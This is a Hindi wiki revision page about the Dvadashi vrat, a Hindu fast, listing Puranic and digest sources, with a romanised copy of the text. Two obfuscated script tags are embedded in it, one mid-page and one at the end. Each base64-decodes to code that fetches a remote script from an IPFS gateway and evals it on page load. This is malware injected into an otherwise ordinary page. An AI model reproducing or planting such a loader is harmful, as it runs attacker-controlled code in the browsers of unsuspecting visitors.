Difference between revisions of "द्वादशी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] एवं [[कृष्ण पक्ष]] की [[द्वादशी]] पर उपवास करने से पुण्य होता है।<ref>विष्णुधर्मोत्तरपुराण (1|151|1-21 एवं 1|160)</ref>  
+
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] एवं [[कृष्ण पक्ष]] की [[द्वादशी]] पर उपवास करने से पुण्य होता है।<ref>विष्णुधर्मोत्तरपुराण (1|151|1-21 एवं 1|160</ref>  
 
*कुल लगभग 50 द्वादशीव्रत हैं।<ref>कृत्यकल्पतरु (व्रत0, 310-369); हेमाद्रि (व्रत0 1, 1162-1222); हेमाद्रि (काल, 289-298); कालनिर्णय (275-277); तिथितत्त्व (114-117); समयमयूख (92-95); पुरुषार्थचिन्तामणि (213-222), व्रतराज (475-495)।</ref>  
 
*कुल लगभग 50 द्वादशीव्रत हैं।<ref>कृत्यकल्पतरु (व्रत0, 310-369); हेमाद्रि (व्रत0 1, 1162-1222); हेमाद्रि (काल, 289-298); कालनिर्णय (275-277); तिथितत्त्व (114-117); समयमयूख (92-95); पुरुषार्थचिन्तामणि (213-222), व्रतराज (475-495)।</ref>  
 
*[[वराह पुराण]]<ref>वराह पुराण, अध्याय 39-49</ref> ने दस अवतारों (मत्स्य से कल्कि तक) के नामों पर 10 द्वादशियों का उल्लेख किया है।  
 
*[[वराह पुराण]]<ref>वराह पुराण, अध्याय 39-49</ref> ने दस अवतारों (मत्स्य से कल्कि तक) के नामों पर 10 द्वादशियों का उल्लेख किया है।  
*[[अग्नि पुराण]]<ref>अग्निपुराण (188)</ref> ने कई द्वादशियों का उल्लेख किया है।  
+
*[[अग्नि पुराण]]<ref>अग्निपुराण (188</ref> ने कई द्वादशियों का उल्लेख किया है।  
*हेमाद्रि<ref>हेमाद्रि (काल॰ 260-263)</ref> ने ब्रह्मवैवर्त से आठ प्रकार की द्वादशियों का उद्धरण दिया है।<ref>देखिए गत अध्याय 5); और देखिए हेमाद्रि (काल0634-637), कृत्यरत्नाकर (129-131)।</ref>
+
*हेमाद्रि<ref>हेमाद्रि (काल॰ 260-263</ref> ने ब्रह्मवैवर्त से आठ प्रकार की द्वादशियों का उद्धरण दिया है।<ref>देखिए गत अध्याय 5); और देखिए हेमाद्रि (काल0634-637), कृत्यरत्नाकर (129-131)।</ref>
 
*'युग्मवाक्य'<ref>कालनिर्णय 275</ref> के मत से [[एकादशी]] से युक्त द्वादशी अच्छी मानी जाती है।  
 
*'युग्मवाक्य'<ref>कालनिर्णय 275</ref> के मत से [[एकादशी]] से युक्त द्वादशी अच्छी मानी जाती है।  
 
+
{{प्रचार}}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 12:50, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl paksh evan krishna paksh ki dvadashi par upavas karane se puny hota hai.[1]
  • kul lagabhag 50 dvadashivrat haian.[2]
  • varah puran[3] ne das avataroan (matsy se kalki tak) ke namoan par 10 dvadashiyoan ka ullekh kiya hai.
  • agni puran[4] ne kee dvadashiyoan ka ullekh kiya hai.
  • hemadri[5] ne brahmavaivart se ath prakar ki dvadashiyoan ka uddharan diya hai.[6]
  • 'yugmavaky'[7] ke mat se ekadashi se yukt dvadashi achchhi mani jati hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vishnudharmottarapuran (1|151|1-21 evan 1|160
  2. krityakalpataru (vrat0, 310-369); hemadri (vrat0 1, 1162-1222); hemadri (kal, 289-298); kalanirnay (275-277); tithitattv (114-117); samayamayookh (92-95); purusharthachintamani (213-222), vrataraj (475-495).
  3. varah puran, adhyay 39-49
  4. agnipuran (188
  5. hemadri (kal॰ 260-263
  6. dekhie gat adhyay 5); aur dekhie hemadri (kal0634-637), krityaratnakar (129-131).
  7. kalanirnay 275

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>